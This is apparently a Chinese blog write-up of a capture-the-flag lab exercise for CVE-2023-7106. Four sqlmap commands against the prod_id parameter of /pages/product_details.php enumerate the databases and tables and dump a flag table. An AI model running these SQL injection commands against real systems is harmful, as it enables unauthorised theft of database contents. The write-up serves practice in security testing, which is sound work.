【春秋云镜】CVE-2023-7106标靶Wp

  • 开发
  • 42

0x01:漏洞点

老样子先,看看标题介绍奥

ok了解到了 我们现在要知道参数是prod_id,路径为/pages/product_details.php

0x02:操作

直接打开SQLmap一把梭

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --current-db

这里的是查看数据库,奥

这里的话当前库是MySQL,后面实际测的时候那个库在electricks里面

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --dbs

这串就是查询库名

然后直接查询表

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks --tables

直接爆出来吧我的Flag!!!!!

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks -T flllaaaag --dump

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-01 00:52:04       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-01 00:52:04       106 阅读

  9. 在Django里面运行非项目文件

    2024-04-01 00:52:04       87 阅读

  19. Python语言-面向对象

    2024-04-01 00:52:04       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-04-01 00:52:04       91 阅读

热门阅读

  2. LeetCode-2952. 需要添加的硬币的最小数量【贪心 数组 排序】

    2024-04-01 00:52:04       37 阅读

  4. 【c++20】CPP-20-STL-Cookbook 学习笔记

    2024-04-01 00:52:04       41 阅读

  5. Leetcode 3100. Water Bottles II

    2024-04-01 00:52:04       35 阅读

  14. RpcContext :提供了在 RPC 调用过程中访问当前调用信息的方法

    2024-04-01 00:52:04       41 阅读

  16. 什么是数据仓库

    2024-04-01 00:52:04       41 阅读

  17. 随机规划:求解报童问题期望值模型的算法方案

    2024-04-01 00:52:04       34 阅读

  23. 云资源调度和管理系统

    2024-04-01 00:52:04       32 阅读

  24. 日本出国留学一年费用大概多少钱

    2024-04-01 00:52:04       38 阅读

  25. ###用sh ``` 用sh ``json失败

    2024-04-01 00:52:04       46 阅读

  28. git-常用命令

    2024-04-01 00:52:04       43 阅读

  30. 【技术】Vue3 组件通讯方法有哪些

    2024-04-01 00:52:04       34 阅读